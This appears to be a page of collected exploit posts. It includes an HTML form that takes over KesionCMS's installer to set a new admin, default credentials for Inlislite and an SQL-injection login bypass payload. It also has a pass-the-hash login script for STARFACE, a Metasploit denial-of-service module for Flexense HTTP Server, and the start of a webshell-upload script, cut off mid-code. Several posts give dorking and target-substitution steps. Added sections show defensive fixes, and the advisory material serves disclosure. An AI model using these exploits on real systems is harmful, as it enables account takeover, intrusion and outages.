<pre><code>====================================================================================================================================<br />| # Title : KesionCMS ASP v9.5 Reinstall Add Admin Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | <br />| # Vendor : https://www.kesion.com/ | <br />| # Dork : Powered by KesionCMS |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Copy & paste the exploit listed below into a text file and save it with the ".html" extension.<br /><br />[+] At lines 09 & 16, change the domain name to that of the target.<br /><br />[+] The affected folder is /install/<br /> This is due to direct unauthorized access to the fourth stage (?action=s4) of the script installation.<br /> The fourth stage (?action=s4) is responsible for configuring the settings of the site administrator. 
<br /> For this, the vulnerability can be exploited through the direct link or using the exploitation written below<br /><br /><br />[+] Exploit<br /><br /> <head><title><br /> Hacked By indoushka<br /> </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" /><br /> <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script><br /> </head><br /> <body> <br /> <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form"><br /> <div class="guide"><br /> <div class="guidetitle"><br /> </div><br /> <div class="clear"></div><br /> </div><br /> <div class="clear"></div><br /> <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5" /><br /> <input type="hidden" name="DBlx" value="" /><br /> <input type="hidden" name="CkbData" value="" /><br /> <br /> <input type="hidden" name="TxtDBName_a" value="" /><br /> <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" /><br /> <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" /><br /> <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" /><br /> <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" /><br /> <br /><div id="http://www.target.127.0.0.1/install/?action=s4"><br /> <br /> <br /><br /> </div><br /> <div class="clear"></div><br /> <div class="sjlist"><br /> <h5>网站参数配置</h5><br /> <ul><br /> <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li><br /> <li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 如http://www.kesion.com。<br /> </li><br 
/> <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 系统会自动获取,建议不要修改。<br /> </li><br /> <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"><br /> 免费版本用户请留空或填“0”。<br /> </li><br /> <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li><br /> <li><span> 后台登录验证码:</span><br /> <input type="radio" name="isCode_a" value="True" /> 启用 <br /> <input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用<br /> </li><br /> <br /> <li><span>管理认证码:</span><br /> <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用 <br /> <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li><br /> </ul><br /> <div class="clear"></div><br /> <h5>填写管理员信息</h5><br /> <ul><br /> <li><span>管理员账号:</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li><br /> <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li><br /> <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li><br /> </ul><br /> <div class="clear blank10"></div><br /> <br /> <div style="padding:5px"><br /> <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit"><br /> </div><br /> </div><br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. 
Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Inlislite V3.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://inlislite.perpusnas.go.id/?read=installerphp | <br />| # Dork : Inlislite V3.1 © 2017 - 2018 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is caused by leaving the default settings in place<br /> during installation of the script and keeping the default username and password.<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin<br /><br />[+] https://127.0.0.1.online/backend/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>================================================================================<br />| # Title : E-commerce Biig Order CMS V2 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits) | <br />| # Vendor : https://www.vaskar.in/ | <br />| # Dork : "shop_detail.php?detail=" |<br />================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : User & Pass : ' or 0=0 #<br /><br />[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.php<br /><br />Greetings to :=====================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |<br />===================================================================================================<br /></code></pre>
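<p>The <code>' or 0=0 #</code> payload in the advisory above only works because the login handler pastes the submitted user name and password straight into an SQL string. The following example was added for this page; it is not code from the product or from the advisory's author. It runs the concatenating pattern against an in-memory SQLite table next to the parameterised, hashed-password form a fixed login should use. The table layout, sample credentials and helper names are constructed, and because SQLite does not treat <code>#</code> as a comment marker the way MySQL does, the sample payload ends in <code>--</code> instead.</p>

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password: str, salt: bytes) -> str:
    # Slow, salted hash so a leaked table does not hand out passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000).hex()


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the shop's admin table (sample data only)."""
    conn = sqlite3.connect(":memory:")
    # Legacy layout: cleartext password compared inside the SQL statement.
    conn.execute("CREATE TABLE legacy_admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO legacy_admin VALUES ('admin', 'S3cret!pass')")
    # Hardened layout: per-user salt plus a PBKDF2 verifier, compared in application code.
    conn.execute("CREATE TABLE admin (username TEXT PRIMARY KEY, salt BLOB, pw_hash TEXT)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admin VALUES (?, ?, ?)",
                 ("admin", salt, hash_password("S3cret!pass", salt)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: whatever the user typed becomes part of the SQL."""
    sql = ("SELECT COUNT(*) FROM legacy_admin WHERE username='" + username
           + "' AND password='" + password + "'")
    try:
        (count,) = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return False  # a malformed injection only produces an SQL error
    return count > 0


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders keep the input as data; the verifier is compared in constant time."""
    row = conn.execute("SELECT salt, pw_hash FROM admin WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(hash_password(password, salt), stored)


# The page's payload ends in "#", MySQL's comment marker; SQLite only knows "--".
BYPASS = "' or 0=0 --"


def demo() -> dict:
    conn = build_db()
    return {
        "vulnerable_valid_login": login_vulnerable(conn, "admin", "S3cret!pass"),
        "vulnerable_bypassed": login_vulnerable(conn, BYPASS, BYPASS),
        "hardened_valid_login": login_hardened(conn, "admin", "S3cret!pass"),
        "hardened_bypassed": login_hardened(conn, BYPASS, BYPASS),
    }


if __name__ == "__main__":
    print(demo())
```

<p>With the injected value the legacy query collapses to <code>WHERE username='' or 0=0</code> and the comment swallows the password check, so the row count is non-zero and the login succeeds; the parameterised lookup finds no such user name and fails. The constant-time comparison and PBKDF2 verifier are the defender's additions for the rest of the login path, independent of the injection fix.</p>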
<pre><code>Advisory: STARFACE: Authentication with Password Hash Possible<br /><br />RedTeam Pentesting discovered that the web interface of STARFACE as well<br />as its REST API allows authentication using the SHA512 hash of the<br />password instead of the cleartext password. While storing password<br />hashes instead of cleartext passwords in an application's database<br />has generally become best practice to protect users' passwords in case<br />of a database compromise, this is rendered ineffective when<br />authentication using the password hash is allowed.<br /><br /><br />Details<br />=======<br /><br />Product: STARFACE<br />Affected Versions: 7.3.0.10 and earlier versions<br />Fixed Versions: -<br />Vulnerability Type: Broken Authentication<br />Security Risk: low<br />Vendor URL: https://www.starface.de<br />Vendor Status: notified<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004<br />Advisory Status: published<br />CVE: CVE-2023-33243<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243<br /><br /><br />Introduction<br />============<br /><br />"When functionality and comfort come together, the result is a<br />state-of-the-art experience that we've dubbed 'comfortphoning'. It's a<br />secure, scalable digital communication solution that meets every need<br />and wish. STARFACE is easy to integrate into existing IT systems and<br />flexibly grows with your requirements."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from<br />the vendor's homepage [1]. The included files can be further examined by<br />either extracting the contents or running the image in a virtual<br />machine. 
The web interface of the PBX uses the JavaScript file at the<br />following path to submit the login form:<br /><br />------------------------------------------------------------------------<br />js/prettifier.js<br />------------------------------------------------------------------------<br /><br />The following two lines of the JavaScript file "prettifier.js" add the<br />two parameters "secret" and "ack" to the form before being submitted:<br /><br />------------------------------------------------------------------------<br />$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));<br />$form(document.forms[0]).add('ack', defaultVals.k);<br />------------------------------------------------------------------------<br /><br />The JavaScript object "defaultVals" is included in the web application's<br />source text. While the value of "defaultVals.k" was found to be the<br />static hash of the PBX version, the value of "defaultVals.bk" contains a<br />nonce only valid for the currently used session. Therefore, the form<br />parameter "ack" is always the same value. For the form value "secret"<br />the function "createHash()" is called with different arguments. The<br />value of "defaultVals.isAd" is set to "false" when login via Active<br />Directory is disabled. The parameters "liv" and "lpv" contain the<br />username and password entered into the form respectively.<br /><br />------------------------------------------------------------------------<br />const createHash = function (isAD, user, pass, nonces) {<br /> if (isAD) {<br /> return forAD.encode(user + nonces + pass);<br /> }<br /> return user + ':' + forSF(user + nonces + forSF(pass));<br />};<br />------------------------------------------------------------------------<br /><br />The expression right after the second return statement is the<br />implementation used when Active Directory login is disabled which is the<br />default setting. 
The return value is composed of the username separated<br />via a colon from a value built using the "forSF()" function. The<br />"forSF()" function was found to calculate the SHA512 hash value. When<br />considering the arguments passed to the function, the hash is calculated<br />as follows:<br /><br />------------------------------------------------------------------------<br />SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))<br />------------------------------------------------------------------------<br /><br />As can be seen, instead of the cleartext password the SHA512 hash of the<br />password is used in the calculation. In conclusion, for the form value<br />"secret" the following value is transmitted:<br /><br />------------------------------------------------------------------------<br />username + ":" + SHA512(<br /> username + defaultVals.k + defaultVals.bk + SHA512(password)<br />)<br />------------------------------------------------------------------------<br /><br />If the SHA512 hash of a user's password is known, it can be directly<br />used in the calculation of the "secret" during the login process.<br />Knowledge of the cleartext password is not required.<br /><br />This finding was also verified by analysing the decompiled Java code of<br />the server component. 
It was also found that the authentication process<br />of the REST API is vulnerable in a very similar manner.<br /><br /><br />Proof of Concept<br />================<br /><br />The following Python script can be used to perform a login by specifying<br />a target URL, a username and the associated password hash:<br /><br />------------------------------------------------------------------------<br />#!/usr/bin/env python3<br /><br />import click<br />import hashlib<br />import re<br />import requests<br />import typing<br /><br /><br />def get_values_from_session(url, session) -> typing.Tuple[str, str]:<br />    k, bk = "", ""<br />    response_content = session.get(f"{url}/jsp/index.jsp").text<br />    # raw strings: "\s" is an invalid escape sequence in a normal string literal<br />    k_result = re.search(r"\sk : '([^']+)'", response_content)<br />    bk_result = re.search(r"\sbk : '([^']+)'", response_content)<br />    if k_result is not None:<br />        k = k_result.group(1)<br />    if bk_result is not None:<br />        bk = bk_result.group(1)<br />    return k, bk<br /><br /><br />def web_login(url, login, pwhash, session) -> bool:<br />    version, nonce = get_values_from_session(url, session)<br />    if version == "" or nonce == "":<br />        print("Web Login failed: Nonce and version hash can not be retrieved.")<br />        return False<br />    value = login + version + nonce + pwhash<br />    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()<br />    data = {<br />        "forward": "",<br />        "autologin": "false",<br />        "secret": f"{login}:{secret}",<br />        "ack": version,<br />    }<br />    login_request = session.post(<br />        f"{url}/login",<br />        data=data,<br />        allow_redirects=False,<br />        headers={"Referer": f"{url}/jsp/index.jsp"},<br />    )<br />    response_headers = login_request.headers<br />    if "Set-Cookie" in response_headers:<br />        session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]<br />        print(f"Session ID: {session_id}")<br />        return True<br />    else:<br />        print("Invalid login data")<br />        return False<br /><br /><br />def get_nonce_from_api(url, session) -> str:<br />    response_content = session.get(f"{url}/rest/login").json()<br />    return response_content["nonce"] if "nonce" in response_content else ""<br /><br /><br />def rest_login(url, login, pwhash, session):<br />    nonce = get_nonce_from_api(url, session)<br />    if nonce == "":<br />        print("REST Login failed: Nonce can not be retrieved.")<br />        return<br />    value = login + nonce + pwhash<br />    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()<br />    data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}<br />    login_request = session.post(<br />        f"{url}/rest/login",<br />        json=data,<br />        headers={"Content-Type": "application/json", "X-Version": "2"},<br />    )<br />    response_data = login_request.json()<br />    token = response_data["token"] if "token" in response_data else "none"<br />    print(f"REST API Token: {token}")<br /><br /><br />@click.command()<br />@click.option('--url', help='Target System URL', required=True)<br />@click.option('--login', help='Login ID', required=True)<br />@click.option('--pwhash', help='Password Hash', required=True)<br />def login(url, login, pwhash):<br />    session = requests.session()<br />    stripped_url = url.rstrip("/")<br />    result = web_login(stripped_url, login, pwhash, session)<br />    if result:<br />        rest_login(stripped_url, login, pwhash, session)<br /><br /><br />if __name__ == "__main__":<br />    login()<br />------------------------------------------------------------------------<br /><br />For example, the SHA512 hash of the password "starface" can be<br />calculated as follows:<br /><br />------------------------------------------------------------------------<br />$ echo -n "starface" | sha512sum<br />a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec -<br />------------------------------------------------------------------------<br /><br />The Python script can be run as follows to perform a login as the user<br />"0001" with 
the aforementioned hash:<br /><br />------------------------------------------------------------------------<br />$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash<br />'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'<br />Session ID: 2CF09656E274F000FFAD023AF37629CE<br />REST API Token: 51eef8f8vp3d3u81k0imjbuuu7<br />------------------------------------------------------------------------<br /><br />When the password hash is valid for the specified user of the targeted<br />instance, a session ID as well as a REST API token is returned.<br />Afterwards, these values can be used to interact with the web<br />application and the REST API.<br /><br /><br />Workaround<br />==========<br /><br />None<br /><br /><br />Fix<br />===<br /><br />On 4 May 2023, version 8.0.0.11 was released. In this version the<br />vulnerability was addressed with a temporary solution, such that the<br />password hashes are encrypted before they are saved in the database.<br />This approach prevents attackers from exploiting this vulnerability in<br />scenarios where they have only acquired pure database access. However,<br />attackers with system level access can bypass this temporary measure as<br />they can extract the encryption key and decrypt the hashes in the<br />database. A solution that fixes this vulnerability entirely is still in<br />progress.<br /><br /><br />Security Risk<br />=============<br /><br />The web interface and REST API of STARFACE allow logging in using the<br />password hash instead of the cleartext password. This can be exploited<br />by attackers who have gained access to the application's database, where the<br />passwords are also saved as a SHA512 hash of the cleartext passwords.<br />While the precondition for this attack could be the full compromise of<br />the STARFACE PBX, another attack scenario could be that attackers<br />acquire access to backups of the database stored on another system.<br />Furthermore, the login via password hash allows attackers permanent<br />unauthorised access to the web interface even if system access was<br />obtained only temporarily. Due to the prerequisites of obtaining access<br />to password hashes, the vulnerability poses a low risk only.<br /><br /><br />Timeline<br />========<br /><br />2022-12-06 Vulnerability identified<br />2022-12-13 Customer approved disclosure to vendor<br />2023-01-11 Vendor notified<br />2023-05-04 Vendor released new version 8.0.0.11<br />2023-05-19 CVE ID requested<br />2023-05-20 CVE ID assigned<br />2023-06-01 Advisory released<br /><br /><br />References<br />==========<br /><br />[0] https://starface.com/en/products/comfortphoning/<br />[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. 
The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://jobs.redteam-pentesting.de/<br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Alter Posthof 1 Fax : +49 241 510081-99<br />52062 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
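<p>The advisory above derives the login <code>secret</code> as <code>username + ":" + SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))</code> (the REST variant drops <code>k</code>). The example below was added for this page and is neither RedTeam Pentesting's proof of concept nor the vendor's code. It shows, on the server's side of that exchange, why the stored SHA512 column is a password-equivalent credential: the verifier can only recompute the secret from the stored hash, so a client that holds the hash is indistinguishable from one that knows the password. Beside it is a hardened verifier in which the client sends the password itself over TLS and the server checks it against a salted PBKDF2 record; that is an assumption chosen for illustration, not the change shipped in 8.0.0.11. The <code>k</code>, <code>bk</code>, user and password values are constructed.</p>

```python
import hashlib
import hmac
import os


def sha512_hex(text: str) -> str:
    return hashlib.sha512(text.encode("utf-8")).hexdigest()


# --- Web-login scheme as described in the advisory ---
# k  : static hash of the PBX version (defaultVals.k)
# bk : nonce valid for the current session (defaultVals.bk)

def secret_from_password(user: str, password: str, k: str, bk: str) -> str:
    """What the browser sends: username ':' SHA512(user + k + bk + SHA512(password))."""
    return user + ":" + sha512_hex(user + k + bk + sha512_hex(password))


def secret_from_hash(user: str, pw_hash: str, k: str, bk: str) -> str:
    """The same value computed from the stored SHA512 alone; the password is never needed."""
    return user + ":" + sha512_hex(user + k + bk + pw_hash)


def server_verify_hash_scheme(stored_pw_hash: str, user: str, k: str, bk: str, secret: str) -> bool:
    """Server side of the scheme. Only the stored SHA512 is available to recompute the
    secret, so whoever holds that column value is as good as a user who knows the password."""
    expected = user + ":" + sha512_hex(user + k + bk + stored_pw_hash)
    return hmac.compare_digest(expected, secret)


# --- Hardened alternative (assumption for this example, not the vendor's fix) ---
# The password travels over TLS; the server keeps a salted, slow verifier that is
# useless as a login credential because the server never accepts the verifier itself.

PBKDF2_ROUNDS = 210_000


def make_password_record(password: str) -> tuple:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def server_verify_hardened(record: tuple, password: str) -> bool:
    salt, stored = record
    candidate = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, stored)


def demo() -> dict:
    # Constructed sample values; k and bk stand in for the page's defaultVals fields.
    user, password = "0001", "starface"
    k, bk = "versionhash-constructed", "nonce-constructed"
    stored_sha512 = sha512_hex(password)  # what the advisory says the database holds

    from_password = secret_from_password(user, password, k, bk)
    from_hash = secret_from_hash(user, stored_sha512, k, bk)
    record = make_password_record(password)
    return {
        "secrets_identical": from_password == from_hash,
        "hash_scheme_accepts_password_login":
            server_verify_hash_scheme(stored_sha512, user, k, bk, from_password),
        "hash_scheme_accepts_hash_only_login":
            server_verify_hash_scheme(stored_sha512, user, k, bk, from_hash),
        "hardened_accepts_password": server_verify_hardened(record, password),
        # feeding the stored verifier back in as if it were the password does not work
        "hardened_accepts_stored_verifier": server_verify_hardened(record, record[1].hex()),
    }


if __name__ == "__main__":
    print(demo())
```

<p>The nonce in the original scheme only prevents replay of a captured <code>secret</code>; it does nothing against a stolen hash, because the hash is exactly the value the nonce gets mixed with. Any challenge-response design in which the server holds the same value the client needs has this property, which is why the hardened variant moves the proof of knowledge to the password itself and relies on TLS for transport.</p>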
<pre><code>##<br /># Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)<br /># Date: 2018-03-09<br /># Exploit Author: Ege Balci<br /># Vendor Homepage: https://www.flexense.com/downloads.html<br /># Version: <= 10.6.24<br /># CVE : CVE-2018-8065<br /><br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br />  include Msf::Auxiliary::Dos<br />  include Msf::Exploit::Remote::Tcp<br /><br />  def initialize(info = {})<br />    super(update_info(info,<br />      'Name' => 'Flexense HTTP Server Denial Of Service',<br />      'Description' => %q{<br />        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.<br />        The vulnerability is caused by a user-mode write access violation and can be triggered by<br />        rapidly sending a variety of HTTP requests with long HTTP header values.<br /><br />        Multiple Flexense applications that use Flexense HTTP server 10.6.24 and below versions are reportedly vulnerable.<br />      },<br />      'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],<br />      'License' => MSF_LICENSE,<br />      'References' =><br />        [<br />          [ 'CVE', '2018-8065'],<br />          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],<br />        ],<br />      'DisclosureDate' => '2018-03-09'))<br /><br />    # Integer options: PacketCount is compared with the integer counter below.<br />    register_options(<br />      [<br />        Opt::RPORT(80),<br />        OptInt.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)", 1725 ]),<br />        OptInt.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090)", rand(4088..5090) ])<br />      ])<br />  end<br /><br />  def check<br />    begin<br />      connect<br />      sock.put("GET / HTTP/1.0\r\n\r\n")<br />      res = sock.get<br />      if res and res.include? 'Flexense HTTP Server v10.6.24'<br />        Exploit::CheckCode::Appears<br />      else<br />        Exploit::CheckCode::Safe<br />      end<br />    rescue Rex::ConnectionRefused<br />      print_error("Target refused the connection")<br />      Exploit::CheckCode::Unknown<br />    rescue<br />      print_error("Target did not respond to HTTP request")<br />      Exploit::CheckCode::Unknown<br />    end<br />  end<br /><br />  def run<br />    unless check == Exploit::CheckCode::Appears<br />      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br />    end<br /><br />    size = datastore['PacketSize'].to_i<br />    print_status("Starting with packets of #{size}-byte strings")<br /><br />    count = 0<br />    loop do<br />      payload = ""<br />      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"<br />      payload << "Host: 127.0.0.1\r\n"<br />      payload << "Accept: " + ('A' * size) + "\r\n"<br />      payload << "\r\n\r\n"<br />      begin<br />        connect<br />        sock.put(payload)<br />        disconnect<br />        count += 1<br />        break if count == datastore['PacketCount'].to_i<br />      rescue ::Rex::InvalidDestination<br />        print_error('Invalid destination! Continuing...')<br />      rescue ::Rex::ConnectionTimeout<br />        print_error('Connection timeout! Continuing...')<br />      rescue ::Errno::ECONNRESET<br />        print_error('Connection reset! Continuing...')<br />      rescue ::Rex::ConnectionRefused<br />        print_good("DoS successful after #{count} packets with #{size}-byte headers")<br />        return true<br />      end<br />    end<br />    print_error("DoS failed after #{count} packets of #{size}-byte strings")<br />  end<br />end<br /></code></pre>
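<p>The module above crashes the server by sending an <code>Accept</code> header of several thousand bytes, which the vulnerable parser copies without checking its length. The example below was added for this page and is not Flexense's or the module author's code; it is a small HTTP/1.x request-head parser that enforces the bounds the vulnerable server lacked, rejecting oversized lines, too many header lines and an oversized head before anything is copied into per-request structures, and answering with 431. The limits, the helper names and the two sample requests (one shaped like the module's payload) are constructed.</p>

```python
class HeaderTooLarge(ValueError):
    """A request line, header line, header count or total head size exceeded its bound."""


def parse_request_head(raw: bytes, max_line: int = 8192, max_headers: int = 100,
                       max_total: int = 65536) -> tuple:
    """Parse an HTTP/1.x request head (request line plus headers) from raw bytes.

    Every length is checked before the corresponding bytes are placed into the parsed
    structures, so an oversized Accept header is refused instead of being handed to
    code that may assume a fixed-size buffer.
    """
    if len(raw) > max_total:
        raise HeaderTooLarge(f"request head exceeds {max_total} bytes")
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head (no blank line)")
    lines = head.split(b"\r\n")
    if len(lines) - 1 > max_headers:
        raise HeaderTooLarge(f"more than {max_headers} header lines")
    request_line = lines[0]
    if len(request_line) > max_line:
        raise HeaderTooLarge("request line too long")
    parts = request_line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        raise ValueError("malformed request line")
    method, target, version = (p.decode("ascii", "strict") for p in parts)
    headers = {}
    for line in lines[1:]:
        if len(line) > max_line:
            raise HeaderTooLarge(f"header line exceeds {max_line} bytes")
        name, colon, value = line.partition(b":")
        if not colon or not name.strip():
            raise ValueError("malformed header line")
        headers[name.strip().lower().decode("ascii", "strict")] = value.strip().decode("latin-1")
    return method, target, version, headers


def respond_to(raw: bytes, **limits) -> bytes:
    """Minimal dispatcher: 431 for oversized heads, 400 for malformed ones, 200 otherwise."""
    try:
        method, target, _version, _headers = parse_request_head(raw, **limits)
    except HeaderTooLarge:
        return b"HTTP/1.1 431 Request Header Fields Too Large\r\nConnection: close\r\n\r\n"
    except ValueError:  # includes UnicodeDecodeError
        return b"HTTP/1.1 400 Bad Request\r\nConnection: close\r\n\r\n"
    body = f"{method} {target}".encode("ascii")
    return (b"HTTP/1.1 200 OK\r\nContent-Length: " + str(len(body)).encode("ascii")
            + b"\r\n\r\n" + body)


# Constructed sample requests (not captured traffic): a normal one, and one shaped like
# the module's payload with an Accept header of 5000 'A' bytes.
NORMAL_REQUEST = b"GET /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\nAccept: text/html\r\n\r\n"
OVERSIZED_ACCEPT = (b"GET /abc HTTP/1.1\r\nHost: 127.0.0.1\r\nAccept: " + b"A" * 5000
                    + b"\r\n\r\n\r\n")


if __name__ == "__main__":
    print(respond_to(NORMAL_REQUEST))
    print(respond_to(OVERSIZED_ACCEPT, max_line=4096))
```

<p>The bound is a policy decision: with the default 8192-byte line limit the 5000-byte Accept header is accepted, with 4096 it is refused. Production listeners put the same limit in configuration (nginx's <code>large_client_header_buffers</code>, for instance); the parser only shows where in the parsing sequence the check has to sit to be effective.</p>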
<pre><code># Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload<br /># Date: 5/29/2023<br /># Author: Alex Gan<br /># Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip<br /># Version: 1.0<br /># Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6<br /># CVE: CVE-2023-33440<br /># References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440<br /># https://www.exploit-db.com/exploits/49320<br /># https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system<br /># <br />#!/usr/bin/env python3<br />import os<br />import sys<br />import requests<br />import argparse<br />from bs4 import BeautifulSoup<br />from urllib.parse import urlparse<br />from requests.exceptions import ConnectionError, Timeout<br /><br />def get_args():<br />    parser = argparse.ArgumentParser()<br />    parser.add_argument('-u', '--url', type=str, help='URL')<br />    parser.add_argument('-p', '--payload', type=str, help='PHP webshell')<br />    return parser.parse_args()<br /><br />def get_user_input(args):<br />    if not (args.url):<br />        args.url = input('Use the -u argument or Enter URL:')<br />    if not (args.payload):<br />        args.payload = input('Use the -p argument or Enter file path PHP webshell: ')<br />    return args.url, args.payload<br /><br />def check_input_url(url):<br />    parsed_url = urlparse(url)<br />    if not parsed_url.scheme:<br />        url = 'http://' + url<br />    if parsed_url.path.endswith('/'):<br />        url = url.rstrip('/')<br />    return url<br /><br />def check_host_availability(url):<br />    try:<br />        response = requests.head(url=url + '/login.php')<br />        if response.status_code == 200:<br />            print("[+] Host is accessible")<br />        else:<br />            print("[-] Host is not accessible")<br />            print(" Status code:", response.status_code)<br />            sys.exit()<br />    except (ConnectionError, Timeout) 